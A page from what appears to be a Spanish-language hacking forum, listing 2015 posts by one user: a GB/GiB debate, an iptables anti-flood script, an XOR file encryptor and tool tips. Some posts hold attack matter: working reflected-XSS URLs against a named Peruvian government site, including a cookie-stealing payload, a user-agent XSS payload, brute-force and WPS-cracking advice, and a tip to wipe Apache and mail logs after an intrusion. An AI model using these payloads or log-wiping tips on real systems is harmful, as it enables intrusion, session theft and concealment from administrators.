Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - v4char

Páginas 1 2 3
#21
Dudas y pedidos generales / Re:Como puedo ver las direcciones ip de los que estan en mi red wifi ?
Diciembre 06, 2015, 10:30:06 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hay apps para Android que te lo dicen en cuestión de segundos, yo uso Fing.



Saludos

Enviado desde mi SM-T550 mediante Tapatalk

Si ,la app esta muy bien pero si no sabes lo que hace de fondo no ganas nada, no sabes si hace ping a todas las direciones de red si envia paquetes arp etc...
#22
Off Topic / Re:Herramientas de seguridad/hacking: opina
Diciembre 06, 2015, 10:26:33 PM
GDB(Linux) y OllyDbg(Win)
#23
Dudas y pedidos generales / Re:diccionarios fuerza bruta
Noviembre 29, 2015, 09:35:11 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Buenas
Alguien podria facilitarme un diccionario de fuerza bruta o como puedo crear un diccionario?
Diccionario rockyou y para crearlos crunch
#24
Hacking ShowOff / Hacking en User agent
Noviembre 19, 2015, 08:37:26 PM
Hoy traigo una tecnica muy bonita (como el pescado) ;D

vamos a google y buscamos check my user agent y entramos en la primera  (se supone que es la mejor) No tienes permitido ver los links. Registrarse o Entrar a mi cuentamodificamos nuestro user agent ponemos ponemos codigo html y magia tienes un XSS y seguro que un sqli aunque no quiero dar ideas ;)


yo puse esto en el user agent
Código: php
"'/>;.>//<h1>v4char</h1><script>alert("hola");</script>


pero puedes probar con sqli

ooooo teneis mi ip.
#25
Hacking ShowOff / [XSS] Peru Gob
Noviembre 19, 2015, 02:13:31 PM
Hola, hoy traigo un XSS en la web del gobierno de peru la vulnerabilidad ya esta reportada por mi de hace mucho pero como no hacen caso...

Bueno el tema fue que me meti en la web en busca de un fallo asi rapido y encontre un xss en el portal de transparencia solo probe XSS pero estoy seguro que puede tener otros como SQLi aunque yo no he probado ni incito a hacerlo bueno es un XSS muy simple no tiene filtros ni nada a si que permite ejecutar javascript lo que puede permitir a un atacante robar la cookie del administrado del sitio y hacer cosas malas aquí dejo un video subido por mí


y ahora unos pequeños ejemplos de lo que puedes hacer

Alert
Código: php
http://www.peru.gob.pe/transparencia/pep_transparencia_osce_exoneraciones_frame.asp?id_entidad=1%27%22;/%3E%3Cscript%3Ealert%28%22v4char%22%29;%3C/script%3E&id_tema=34




Cookies
Código: php
http://www.peru.gob.pe/transparencia/pep_transparencia_osce_exoneraciones_frame.asp?id_entidad=1%27%22;/%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&id_tema=34



Body
Código: php
http://www.peru.gob.pe/transparencia/pep_transparencia_osce_exoneraciones_frame.asp?id_entidad=1%27%22;/%3E%3Cscript%3E%20document.body.innerHTML%20=%20%22%3Ch1%3Ev4char%3C/h1%3E%22;%3C/script%3E&id_tema=34



y asi lo que quieras...
#26
Debates, Reviews y Opiniones / Re:1GB = 1000MB
Noviembre 19, 2015, 12:52:07 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  te guias  creo que por definiciones,  si queires mira el poque la arquitectura de 32 bits  soporta como máximo  4 gigas de ram te darás cuenta que es resultado de elevar  la arquitectura  a 2  es decir  2 ^ 32  da 4 gigas....  o por lo menos eso dice  todo los libros que leo,  según tengo entendido la unidad mas pequeña en informatica es un bit que es 0 y 1,  1 bytes son 8 bits de hay sacamos tambien el sistema octal.... por lo que leo es depende de quien lo diga entoces... por cierto muy buena la wikipedia.... pero dice valores aproximados.... no exactos... es decir el redondeo de toda la vida....


pd: Me desdigo, leyendo todo por lo que veo que toma la palabra del sistema internacional, pero el nombre del estandar iso....  vamos un lio a mi modo de ver

Genial debate :)

En los 32 bits estas hablando de bites pero no serian 4GB si no 4GiB( gibibyte) de ahi el bi de binario en este sistema solo cambio la nomenclatura para que las potencias fuesen iguales en todos los sistemas
#27
Debates, Reviews y Opiniones / Re:1GB = 1000MB
Noviembre 19, 2015, 10:18:02 AM
Tienes toda la razón pero es más un probrema de nomenclatura que de otra cosa antes Giga se estaba cogiendo(latinos no seais mal pensados) como 230 y ahora se esta utilizando como 109 que es lo correcto
#28
Debates, Reviews y Opiniones / Re:1GB = 1000MB
Noviembre 18, 2015, 03:55:20 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Yo estoy con  @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, por que se usan potencias de dos?,  muy simple, código binario, que es lo único que entiende el pc.  La informática es una ciencia, y por lo tanto es exacta.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#29
Dudas y pedidos generales / Re:Wireless Hacking/Pentest en Smartphone ?
Noviembre 17, 2015, 08:17:44 PM
Había leido que en algunos dispositivos android con antenas de red muy determinadas si eres root se podia a llegar a ejecuat aircrack sacando claves wep o los handshake de las claves WPA/WPA2, pero solo dispositivos muy concretos. En la mayoria de android no se puede.
#30
Hacking / Re:Tutorial Iptables (protegerse de denegación de servicio)
Noviembre 17, 2015, 08:15:17 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy bueno @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, personalmente prefiero usar fail2ban + iptables que me va bastante bien.

Por si te interesa te dejo mi artículo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Esta muy bien, no conocia fail2ban aun asi me falta pulir un par de cosas con iptables, pero muchas gracias
#31
Debates, Reviews y Opiniones / Re:1GB = 1000MB
Noviembre 17, 2015, 04:18:47 PM
Yo opino que el este metodo de 1GB = 1000MB y etc esta mucho mejor porque estas respetando las potencias de Giga peta tera mega etc..

Ademas si esta puesto como SI sera por algo.
#32
Dudas y pedidos generales / Re:Como puedo ver las direcciones ip de los que estan en mi red wifi ?
Noviembre 17, 2015, 12:15:58 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si si lo siento con lo del triple post, me equivoque. :D :D

Tengo Kali Linux pero lo que no me queda claro es donde busco los usuarios conectados a mi red.Estoy en mi configuracion y le di click en ver clientes asociados y solo me sale el MAC y otras caracteristicas, pero la ip NO

puedes usar netdiscover pero es mas fiable entrar al router
#33
Debates, Reviews y Opiniones / 1GB = 1000MB
Noviembre 17, 2015, 12:09:35 PM
En este tema queria debatir la nueva implantación del sistema internacional, muy poca gente sabe que en el nuevo SI y 1GB es igual a 1000MB y 1MB es igual a 1000KB

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


¿Que opinais sobre esto, es correcto o no?
#34
Hacking / Tutorial Iptables (protegerse de denegación de servicio)
Noviembre 16, 2015, 08:21:42 PM
Aquí traigo un script a modo de tutorial de como protegerse de ataques de denegación de servicio

Código: bash
#!/bin/bash

# Limpiar reglas anteriores

iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

##########################################################

# Se crea el archivo donde estan las ip bloqueadas se actualiza cada 200 segundos

iptables -A  listanegra -m recent --name lista_negra --rcheck --seconds 200 -j DROP

# Detener ataques de ICMP flood #

# Creamos la cadena icmp-flood
iptables -N icmp-flood

# Saltar a la cadena cuando el  ICMP  es detectado
iptables -A INPUT -p icmp -j icmp-flood

# Evitar si supera los 4 por segundo
iptables -A icmp-flood -m limit --limit 4/s --limit-burst 8 -m comment --comment "Limite de ICMP alcanzado" -j RETURN

# Registrar en el log cuando es muy alto
iptables -A icmp-flood -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix "Detectado ICMP flood "

# Mandar a lista negra la  IP por 200 segundos
iptables -A icmp-flood -m recent --name lista_negra --set -m comment --comment "Lista negra IP" -j DROP

##########################################################

# Detener el UDP flood #

# Creamos la cadena udp-flood
iptables -N udp-flood

# Saltar a la cadena cuando el UDP es detectado
iptables -A INPUT -p  udp -j udp-flood

# UDP maximo 10 por segundo limitar a 20
iptables -A udp-flood -m limit --limit 10/s --limit-burst 20 -m comment --comment "Limite UDP superado" -j RETURN

# Añadir al log si es muy alto
iptables -A udp-flood -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix "Detectado UDP flood "

# Mandar a lista negra la  IP por 200 segundos
iptables -A udp-flood -m recent --name lista_negra --set -m comment --comment "Lista negra IP" -j DROP

##########################################################

# Detener SYN flood #

# Más de lo mismo
iptables -N syn-flood
iptables -A INPUT -p tcp --syn -j syn-flood
iptables -A syn-flood -m limit --limit 2/s --limit-burst 6 -j RETURN
iptables -A syn-flood -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix "Detectado SYN flood "
iptables -A syn-flood -m recent --name lista_negra --set -j DROP
iptables -A INPUT -p tcp ! --syn -m state --state NEW -m comment --comment "Lista negra IP" -j DROP

##########################################################

# Paquetes mal formados #

iptables -N paquetes_malformados
iptables -A paquetes_malformados -m state --state INVALID -j DROP
iptables -A paquetes_malformados -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
iptables -A paquetes_malformados -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
iptables -A paquetes_malformados -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
iptables -A paquetes_malformados -p tcp ! --syn -m state --state NEW -j DROP
iptables -A paquetes_malformados -f -j DROP
iptables -A paquetes_malformados -j RETURN

##########################################################

# Cortafuegos por v4char #


Si hay algun error o algún ataque que se me pase decirlo en los comentarios espero que sirva de ayuda para protejer routers, servidores y equipos.

Puedes ver la lista negra con el comando
Código: php
cat /proc/net/xt_recent/lista_negra
#35
Diseño UX/UI / Re:Pide tu firma Underc0de V3.
Noviembre 16, 2015, 07:19:49 PM
Yo quiero una que diga v4char, gracias.
#36
Dudas y pedidos generales / Re:Hackear una computadora por ip
Septiembre 18, 2015, 11:29:18 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola,
cual de estos troyanos hackea una computadora por ip publica y puerto?
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Saludos

Ninguno, no puedes pretender usar un programa para hackear una computadora tienes que saber lo que hacen las cosas y lo que son los troyanos, los troyanos los utilizas una vez accedes a la computadora para mantener el acceso y controlar la otra maquina pero primero tienes que acceder.
#37
Hacking / Re:FTPBruteForce
Septiembre 18, 2015, 11:26:14 AM
Prueba algo como esto

Código: java
import java.util.Scanner;

public class main
{
	public main()
	{

	}
    	public static void main(String[] args)
        {
        	int n_intentos = 10;
		
		Scanner sc = new Scanner(System.in);		

		System.out.print("Numero de intentos: ");		
		
		n_intentos = sc.nextInt();
	
		for (int x = 0; x < n_intentos ; x++)
		{
			System.out.println ("Intento "+(x+1));
		}
        }
}
#38
C / C++ / Encriptador & Desencriptador
Agosto 31, 2015, 11:09:04 PM
Traigo un programa hecho en C que Encripta y Desencripta cualquier tipo de archivo con una clave alfanumérica.
Aquí la url de github donde hay un exe para la gente de windows (Para los que no saben compilar) No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



El código:
Código: cpp
#include <stdio.h>
#include <string.h>

int cifrado (int letra,long clave)
{
    letra = letra ^ clave;

    return letra;
}

int descifrado (int letra,long clave)
{
    letra = letra ^ clave;

    return letra;
}

int main()
{
    int var = 0,clave = 0,letra;
    FILE *lectura;
    FILE *escritura;
    char nombre_de_archivo[100];



    while (1)
    {
        printf("Encriptador/Desencriptador por v4char\n\n\n\n\n\n");
        printf("1-Cifrar\n2-Descifrar\n3-Salir\n\n\n\nIntroduce: ");
        fflush(stdout);
        scanf("%i", &var);
        if(var==3)
        {
            break;
        }

        printf("Nombre de archivo: ");
        fflush(stdout);
        scanf("%s", nombre_de_archivo);

        lectura = fopen(nombre_de_archivo, "r");

        if (lectura==NULL)
        {
            printf("El archivo no existe\n");
            return -1;
        }

        printf("Clave: ");
        fflush(stdout);
        scanf("%i", &clave);
        fflush(stdin);

        escritura = fopen("temporal", "w");

        if (var == 1)
        {

            while(!feof(lectura))
            {
                fputwc(cifrado(getc(lectura),clave), escritura);
            }

            fclose(lectura);
            fclose(escritura);

            remove(nombre_de_archivo);

            escritura = fopen("temporal", "r");
            lectura = fopen(nombre_de_archivo, "w+");

            while(!feof(escritura))
            {
                letra = getc(escritura);
                fputwc(letra, lectura);
            }


        } else if (var == 2)
        {
            while(!feof(lectura))
            {
                fputwc(cifrado(getc(lectura),clave), escritura);
            }

            fclose(lectura);
            fclose(escritura);

            remove(nombre_de_archivo);

            escritura = fopen("temporal", "r");
            lectura = fopen(nombre_de_archivo, "w+");

            while(!feof(escritura))
            {
                letra = getc(escritura);
                fputwc(letra, lectura);
            }

        } else
        {
            return -2;
        }
        fclose(lectura);
        fclose(escritura);
        remove("temporal");
        printf("\n\n\n\n\n\nTodo correcto\n\n\n\n\n\n");
        printf("==========================================================================\n");
    }

    return 0;
}


Un saludo, y no duden en comentar las dudas, sugerencias o fallos.
#39
Dudas y pedidos generales / Re:Problemas con reaver y WPSPIN
Julio 31, 2015, 07:32:04 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola chicos soy nuevo por el foro y nuevo en cuanto a auditoría de redes estuve analizando mi propia red pero al usar reaver o el WPSPIN que al empezar  a los diez quince minutos se queda en 90.91% y allí puede durar tres días y siempre estará en ese por estar haya gente conectada o  desconectada no avanza.... Si quien sabe de algún fallo les agradecería la ayuda...... GRACIAS

Enviado desde mi SM-G900H mediante Tapatalk

Eso es que te bloquea la red por probar muchos pines apunta el pin en el que se queda y luego lo pruebas cuando se desbloque
#40
Dudas y pedidos generales / Re:Borrar Logs desde una shell cargada en un servidor.
Julio 30, 2015, 06:21:12 PM
Eso es el historial de  comandos pero tambien hay logs de apache con conexiones http o los del servidor de correo si realizaste la intrusion por ellos deberias borrarlos.
Páginas 1 2 3